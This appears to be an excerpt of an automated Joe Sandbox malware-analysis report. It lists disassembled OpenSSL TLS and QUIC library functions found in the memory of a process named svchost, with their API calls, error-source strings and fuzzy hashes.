                                                                                                • Part of subcall function 00007FFBAB411C50: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB411C95
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49238B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB4923A3
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB4923F4
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492405
                                                                                              • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49241B
                                                                                              • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492449
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492457
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49246C
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_numR_newR_set_debugX509_i2d_$L_sk_valueO_zallocR_vset_error
                                                                                              • String ID: construct_ca_names$ssl\statem\statem_lib.c
                                                                                              • API String ID: 3967720115-3433467796
                                                                                              • Opcode ID: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                              • Instruction ID: 988055b3c96940c923c5b47bff178365bb5ace16fbd8b2eb1f08fd41ce698471
                                                                                              • Opcode Fuzzy Hash: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                              • Instruction Fuzzy Hash: 904182A1F0E25381F663E772E8925BD5254AF847D0F448431DE2D87BB6EE3CE5468311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$memcmp
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_renegotiate
                                                                                              • API String ID: 4071200903-678074351
                                                                                              • Opcode ID: 1c68670593f75e14462b4233b901ff831ffe0b28bd8abc49050f6258505b1373
                                                                                              • Instruction ID: b0301e6940dae0b03c3bc0f64555c462347b8049eb706a6fb174c77b1fec1104
                                                                                              • Opcode Fuzzy Hash: 1c68670593f75e14462b4233b901ff831ffe0b28bd8abc49050f6258505b1373
                                                                                              • Instruction Fuzzy Hash: C541B3B1B1F68281EB529B71D8916BC6350EF44B84F04C432EF2D47BAADF6CE5968300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: DISABLE_ACTIVE_MIGRATION appears multiple times$DISABLE_ACTIVE_MIGRATION is malformed$ORIG_DCID was not sent but is required$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_on_transport_params$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-1192419531
                                                                                              • Opcode ID: 5830b729496d42124c96b86375396b27e3c5cb77b2503c8a1b9c9641ad83453c
                                                                                              • Instruction ID: ae105b5945cbd8f7e559762043c1d2de1805ccf495c0c29c7992fdecd3dcb02b
                                                                                              • Opcode Fuzzy Hash: 5830b729496d42124c96b86375396b27e3c5cb77b2503c8a1b9c9641ad83453c
                                                                                              • Instruction Fuzzy Hash: C141BFB2A0EB5296FB5ADB70E4512BD63A0FB04344F448439DE6D17AA5DF3CE465C300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeR_vset_error
                                                                                              • String ID: ssl3_digest_cached_records$ssl\s3_enc.c
                                                                                              • API String ID: 2289415696-2941011472
                                                                                              • Opcode ID: da33691dc6dd1cb9f7b7ff8dcae513d8a162f21f9c151df262fa9d1f417888f7
                                                                                              • Instruction ID: c25e742090f6dabbeca98802372a3516c5f4d9c5946b744636ae6a211ccc6ecf
                                                                                              • Opcode Fuzzy Hash: da33691dc6dd1cb9f7b7ff8dcae513d8a162f21f9c151df262fa9d1f417888f7
                                                                                              • Instruction Fuzzy Hash: 794198B1E1E65291F762EB72E8527FE2350AF84B80F448432DE2D476B6EE3CE4458750
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B5E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B76
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3,?,-0000001F,00000000,?), ref: 00007FFBAB430B86
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BBC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BD4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB4329E3), ref: 00007FFBAB430BE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_use_certificate$ssl\ssl_rsa.c$ssl_set_cert
                                                                                              • API String ID: 1552677711-3127846650
                                                                                              • Opcode ID: 27411270e6861773d150b3f147f4ce61720165926f59962a3fcfeb90c5a13ce7
                                                                                              • Instruction ID: 2f64b6746154bd12cb0588c3f683b0515c7a4542bbedd21f66e07be1faec505e
                                                                                              • Opcode Fuzzy Hash: 27411270e6861773d150b3f147f4ce61720165926f59962a3fcfeb90c5a13ce7
                                                                                              • Instruction Fuzzy Hash: 3C31E5B6B1964282E752DB32E9422FE6361EF447C4F588431EE6C43BFADE2CE5558700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Error Code: %llu$ Reason: $ (app)$ (transport)$Connection close
                                                                                              • API String ID: 4098839300-216527848
                                                                                              • Opcode ID: d7ddc8cf435bb3111548bbccbadb7f17fcf1fe5d36f9c0ed41b9eb447eb2bb56
                                                                                              • Instruction ID: 8a6456e109500bdbf91fdeb93fde6df62c3aede6d8b22a49ced3ec4258481faa
                                                                                              • Opcode Fuzzy Hash: d7ddc8cf435bb3111548bbccbadb7f17fcf1fe5d36f9c0ed41b9eb447eb2bb56
                                                                                              • Instruction Fuzzy Hash: 24213AE1B4A60384FE26DB75E9512FC2BA1AF45794F44D036DE2E472B5DE3CE08A8300
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: C_start_jobR_newR_set_debugR_set_errorX_newX_set_callback
                                                                                              • String ID: ($ssl\ssl_lib.c$ssl_start_async_job
                                                                                              • API String ID: 3907389051-658281695
                                                                                              • Opcode ID: 0286416a0bbb87ad2c76a200c5a148f02a65b78661a6a10dd9f7a7182fca951f
                                                                                              • Instruction ID: 2ea58d055c416f196e1c995a8c25261ef25ee752ed5715d05bcf6ec4a4e546ca
                                                                                              • Opcode Fuzzy Hash: 0286416a0bbb87ad2c76a200c5a148f02a65b78661a6a10dd9f7a7182fca951f
                                                                                              • Instruction Fuzzy Hash: 82416DB1A1EA8282F7629B35E4403B93290FB01798F948235ED7D876F9DF3CE4459B11
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X509X509_freeX509_new_exd2i_
                                                                                              • String ID: SSL_CTX_use_certificate_ASN1$ssl\ssl_rsa.c
                                                                                              • API String ID: 4137050946-3637493151
                                                                                              • Opcode ID: 3fee11c779347f01daf99bb784c709729bd0efc620f5ff9e4da98003fe4d1301
                                                                                              • Instruction ID: e45169ca9c71a3c383de4acf02b5a4d104bb144a98f6bab6b5335e150ce2c4bc
                                                                                              • Opcode Fuzzy Hash: 3fee11c779347f01daf99bb784c709729bd0efc620f5ff9e4da98003fe4d1301
                                                                                              • Instruction Fuzzy Hash: A6218662B6A54181E7A2E736E4822BE6350EF88780F549032FE6D837B6DE2CD549C700
                                                                                              APIs
                                                                                              • BIO_indent.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB4409EF
                                                                                              • BIO_printf.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440A31
                                                                                              • BIO_indent.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440A83
                                                                                              • BIO_printf.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FFBAB43EC37), ref: 00007FFBAB440ADB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s, Length=%d$UNKNOWN$Unsupported, hex dump follows:$message_seq=%d, fragment_offset=%d, fragment_length=%d
                                                                                              • API String ID: 1860387303-4198474627
                                                                                              • Opcode ID: 1ee8b2b0ac70d7455294be4b66ab1d88a777fabf19244c22c1cfcb7fd7e4899a
                                                                                              • Instruction ID: 0edbfc3b598cedccd92fe5aaedbb1c4a15615464fec4d77824d456bb84515cf2
                                                                                              • Opcode Fuzzy Hash: 1ee8b2b0ac70d7455294be4b66ab1d88a777fabf19244c22c1cfcb7fd7e4899a
                                                                                              • Instruction Fuzzy Hash: FE5102B27181E146EA26CB26E494A6D7FA0EB85790F04C135EEBD43BA2CE3CC156C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl$O_freeO_newO_s_fileR_clear_last_markR_pop_to_markR_set_markX_freeY_free
                                                                                              • String ID: PEM
                                                                                              • API String ID: 753178889-379482575
                                                                                              • Opcode ID: e927e7a33dc3b8603c3cdaf5b3c9479e23448344002fab8ad0ab43fd64048534
                                                                                              • Instruction ID: e90cb8517ce3ccd482e50d9c5f49480430359b9b47f3564613366fc62c718ad6
                                                                                              • Opcode Fuzzy Hash: e927e7a33dc3b8603c3cdaf5b3c9479e23448344002fab8ad0ab43fd64048534
                                                                                              • Instruction Fuzzy Hash: 9B416FB2A0AB4281FA269B76E44167E7290EF84BC0F049135EE6D47BA6DE3DE401D710
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_check_forged_pkt_limit$forgery limit$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-109013121
                                                                                              • Opcode ID: 5103d72ccc1721e5e6ece00c8ca9d279deb014c3c3a7ff7981f06d53f5991793
                                                                                              • Instruction ID: d866857d40a443c3266f655485de5b9db6d2e0b0e3e64b6d4c406f1b5693e8b5
                                                                                              • Opcode Fuzzy Hash: 5103d72ccc1721e5e6ece00c8ca9d279deb014c3c3a7ff7981f06d53f5991793
                                                                                              • Instruction Fuzzy Hash: 8941B4B2A0EB9282FA55EB20E4503B973A5EB84780F448135DFAD43BA5DF3CE546C704
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$N_num_bitsN_ucmpR_vset_error
                                                                                              • String ID: srp_verify_server_param$ssl\tls_srp.c
                                                                                              • API String ID: 2242215446-1772774368
                                                                                              • Opcode ID: 73d97b3cb48666df6e1ab435c8d32a358283c4f6a6a6a512923b1aa231862c96
                                                                                              • Instruction ID: 15ecbd7671a578c6fbed2cb8711058460a99f94b2955a75b95693c858ec7bd3c
                                                                                              • Opcode Fuzzy Hash: 73d97b3cb48666df6e1ab435c8d32a358283c4f6a6a6a512923b1aa231862c96
                                                                                              • Instruction Fuzzy Hash: 743180F0F4A54341FB56AB72D8A27F91350AF80B84F488431DD2D876F6DE2CE5968311
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$Y_new
                                                                                              • String ID: SSL_CTX_use_RSAPrivateKey$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 2166683265-1409161961
                                                                                              • Opcode ID: 2a8756bd538d615ab31598c6ff8793c252482272826b21cb4106fb6848fe224d
                                                                                              • Instruction ID: 083cfbd86796a6ded14c639707a534f52d512130288ad121e00c0e04df775e22
                                                                                              • Opcode Fuzzy Hash: 2a8756bd538d615ab31598c6ff8793c252482272826b21cb4106fb6848fe224d
                                                                                              • Instruction Fuzzy Hash: CF21D6B1B5D64281EA56FB76E5821FD2351EF487C4F089434EE2D47BA7DE2CE4468700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Len: <implicit length>$ Offset: %llu$ Stream id: %llu
                                                                                              • API String ID: 3964688267-1947365733
                                                                                              • Opcode ID: 8093ca9b74c9643fa43f1d33d32e90ff7d11a8e74e6d4d7242e2012fa385b179
                                                                                              • Instruction ID: f05300e1ee54756cdfdf7bc6c434b9b58cadb2bb68d01705f905ac30449301fa
                                                                                              • Opcode Fuzzy Hash: 8093ca9b74c9643fa43f1d33d32e90ff7d11a8e74e6d4d7242e2012fa385b179
                                                                                              • Instruction Fuzzy Hash: C7113DE1E4A65390FE26DBB5E8613FC1760AF45788F449036DE2E171B6DE3CE5868300
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_valueX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoY_get_security_bits
                                                                                              • String ID:
                                                                                              • API String ID: 3095628011-0
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_client_certificate
                                                                                              • API String ID: 4275876640-1158595938
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48CD10), ref: 00007FFBAB48CFC3
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48CD10), ref: 00007FFBAB48CFDB
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_post_process_server_rpk
                                                                                              • API String ID: 1390262125-914124065
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                                                                                              • String ID: ssl\statem\statem.c$state_machine
                                                                                              • API String ID: 2605663294-1334640251
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2sn.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D287
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2AC
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2sn.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2DE
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2E9
                                                                                                • Part of subcall function 00007FFBAB41D250: OBJ_nid2ln.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2F4
                                                                                                • Part of subcall function 00007FFBAB41D250: EVP_PKEY_is_a.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB43B8EA,00000000,?,00000000,?,?,?,00000001,00007FFBAB43CAB7,?,00007FFBAB417658), ref: 00007FFBAB41D2FF
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5), ref: 00007FFBAB48AC8A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5), ref: 00007FFBAB48ACA2
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB48ACDE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB48ACF6
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB48AD4E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB48AD66
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5,?,?,?,?,?,?), ref: 00007FFBAB48AD73
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48E1D5,?,?,?,?,?,?), ref: 00007FFBAB48AD8B
                                                                                              Similarity
